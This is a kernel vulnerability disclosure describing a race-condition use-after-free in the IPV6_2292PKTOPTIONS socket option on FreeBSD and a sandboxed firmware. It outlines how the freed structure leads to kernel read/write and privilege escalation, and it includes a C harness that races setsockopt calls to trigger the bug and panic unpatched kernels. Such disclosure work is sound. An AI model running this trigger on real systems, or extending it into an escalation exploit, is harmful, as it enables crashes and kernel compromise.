Due to missing locks around the IPV6_2292PKTOPTIONS option of setsockopt, two concurrent callers can race so that the struct ip6_pktopts buffer is freed while ip6_setpktopt is still working on it. That structure holds pointers (among them ip6po_pktinfo) that can be hijacked to obtain arbitrary kernel read/write primitives, from which kernel code execution follows easily. The vulnerability is reachable from the WebKit sandbox and is present in the latest FW, 7.02.
Attached is a Proof-Of-Concept that achieves a Local Privilege Escalation on FreeBSD 9 and FreeBSD 12.
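The race described above, as an added illustrative harness that is not the attached Proof-of-Concept and is not the reporter's code: two processes share one AF_INET6 socket and hammer setsockopt(IPV6_2292PKTOPTIONS) on it, one installing an IPV6_PKTINFO control message (the path that ends in ip6_setpktopt populating ip6po_pktinfo) and the other passing a zero-length buffer, which clears the option set and frees the struct ip6_pktopts. It assumes a POSIX system where IPV6_2292PKTOPTIONS is exposed by <netinet/in.h> and an IPv6 socket can be created; the local struct pktinfo_payload mirrors the layout of struct in6_pktinfo so the file builds without platform feature macros. Nothing here reclaims the freed chunk or builds a read/write primitive; on an unpatched kernel the visible effect of the lost race is a crash.

```c
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Same layout as struct in6_pktinfo (RFC 3542): a 16-byte address followed
 * by an interface index. Declared locally (assumption) so the harness does
 * not depend on _GNU_SOURCE or similar feature macros. */
struct pktinfo_payload {
    struct in6_addr addr;
    unsigned int    ifindex;
};

/* Write a single IPV6_PKTINFO control message into buf and return its
 * CMSG_SPACE length, or 0 if buf is too small. The header and payload are
 * copied in via memcpy so buf needs no particular alignment. */
size_t build_pktinfo_cmsg(unsigned char *buf, size_t buflen, unsigned int ifindex)
{
    const size_t need = CMSG_SPACE(sizeof(struct pktinfo_payload));
    if (buf == NULL || buflen < need)
        return 0;
    memset(buf, 0, need);

    struct cmsghdr hdr;
    memset(&hdr, 0, sizeof hdr);
    hdr.cmsg_len   = CMSG_LEN(sizeof(struct pktinfo_payload));
    hdr.cmsg_level = IPPROTO_IPV6;
    hdr.cmsg_type  = IPV6_PKTINFO;
    memcpy(buf, &hdr, sizeof hdr);

    struct pktinfo_payload pi;
    memset(&pi, 0, sizeof pi);
    pi.addr    = in6addr_loopback;   /* any valid unicast address will do */
    pi.ifindex = ifindex;            /* 0 = let the kernel pick the interface */
    memcpy(buf + CMSG_LEN(0), &pi, sizeof pi);
    return need;
}

/* Sanity check on a buffer produced by build_pktinfo_cmsg: returns 1 if it
 * carries exactly one IPV6_PKTINFO cmsg of the expected length, else 0. */
int pktinfo_cmsg_ok(const unsigned char *buf, size_t len)
{
    struct cmsghdr hdr;
    if (buf == NULL || len < CMSG_LEN(sizeof(struct pktinfo_payload)))
        return 0;
    memcpy(&hdr, buf, sizeof hdr);
    return hdr.cmsg_level == IPPROTO_IPV6 &&
           hdr.cmsg_type  == IPV6_PKTINFO &&
           hdr.cmsg_len   == CMSG_LEN(sizeof(struct pktinfo_payload));
}

/* Race the install path against the clear path for `seconds` seconds.
 * Returns the number of install calls the parent issued, or -1 if the
 * socket or the child process could not be created. Both processes hold
 * the same in-kernel socket, so both operate on the same ip6_pktopts. */
long run_pktoptions_race(unsigned int seconds)
{
    unsigned char cmsg[64];
    size_t cmsg_len = build_pktinfo_cmsg(cmsg, sizeof cmsg, 0);
    int fd = socket(AF_INET6, SOCK_DGRAM, 0);
    if (fd < 0 || cmsg_len == 0)
        return -1;

    pid_t child = fork();
    if (child < 0) {
        close(fd);
        return -1;
    }
    if (child == 0) {
        /* Clear path: a zero-length option tears down and frees the
         * socket's struct ip6_pktopts. */
        for (;;)
            setsockopt(fd, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, NULL, 0);
    }

    /* Install path: the cmsg is parsed and ip6po_pktinfo is written into the
     * same struct ip6_pktopts the child may be freeing at that moment. */
    long calls = 0;
    time_t end = time(NULL) + seconds;
    while (time(NULL) < end) {
        setsockopt(fd, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, (socklen_t)cmsg_len);
        calls++;
    }
    kill(child, SIGKILL);
    waitpid(child, NULL, 0);
    close(fd);
    return calls;
}

int main(void)
{
    long n = run_pktoptions_race(3);
    if (n < 0) {
        perror("socket/fork");
        return 1;
    }
    printf("parent issued %ld IPV6_2292PKTOPTIONS install calls\n", n);
    return 0;
}
```

Run it only on a machine you are prepared to panic. On a patched kernel the two paths are serialized and the program simply exits after a few seconds; the install path returning EINVAL or ENOPROTOOPT on some platforms does not matter for the race, since the free in the clear path is what the unlocked window exposes.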